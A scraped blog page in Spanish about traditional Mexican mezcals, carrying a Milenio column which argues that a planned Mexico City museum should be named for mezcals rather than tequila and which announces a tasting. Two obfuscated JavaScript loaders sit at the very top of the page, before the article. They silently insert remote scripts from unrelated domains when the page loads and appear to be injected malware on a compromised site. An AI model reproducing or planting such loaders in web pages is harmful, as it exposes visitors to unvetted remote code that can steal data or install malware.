;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 10. Museo de los Mezcales en el DF: reflexión en el Bicentenario

10. Museo de los Mezcales en el DF: reflexión en el Bicentenario


Para la niña Júlia Lira, reina de batería de Viradouro, escuela de Río de Janeiro que dedicará su samba-enredo a México el 14 de febrero.

El gobierno del DF construye el Museo del Tequila y el Mezcal en Garibaldi, momento propicio para reflexionar sobre la importancia y mitos de estas bebidas en la conformación de nuestras múltiples identidades culturales.
Por principio, el nombre es erróneo, pues el tequila auténtico, originario de Amatitán, es un mezcal jalisciense del Valle de Tequila y de los Altos, pese a que su Denominación de Origen incluya, fraudulentamente, todo Jalisco, partes de Michoacán, Nayarit, Guanajuato y Tamaulipas. En Jalisco, los habitantes de las zonas de Raicilla (otro mezcal) en el occidente, así como del sur y del JalMich donde hacen mezcal o vino mezcal en ollas de barro, no consideran el tequila parte de su gastronomía, se ofenden con sólo insinuarlo.
Si cada región tiene sus mezcales, el tequila no es representativo de la identidad nacional, pues ni siquiera lo es de la jalisciense. Así que el museo debe llamarse de los Mezcales, pues éstos representan identidades culturales diferentes, manifiestas en gastronomías regionales de gran refinamiento.
Los Mezcales son Patrimonio Cultural Inmaterial que incluye aspectos materiales concretos como las materias primas y los instrumentos de elaboración, y aspectos menos tangibles que son los que les dan especificidad: aromas, sabores y reglas de calidad regionales transmitidos por tradición oral, razón por la que los Maestros Mezcaleros y sus comunidades, definidos por UNESCO como portadores, son sus legítimos dueños y auténticos expertos. Así que el objetivo del museo debe ser el dar a conocer los Mezcales a través de sus portadores mediante saboreadas dirigidas por ellos mismos.
Para conocer a qué saben los auténticos mezcales de Jalisco, será menester ir a la Tertulia Mezcalera de Red Fly, Orizaba 145, Roma, DF, el martes 9 a las 20:00 horas, donde se saborearán dos: de maguey Azul y de Lineño.
http://impreso.milenio.com/node/8715195

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *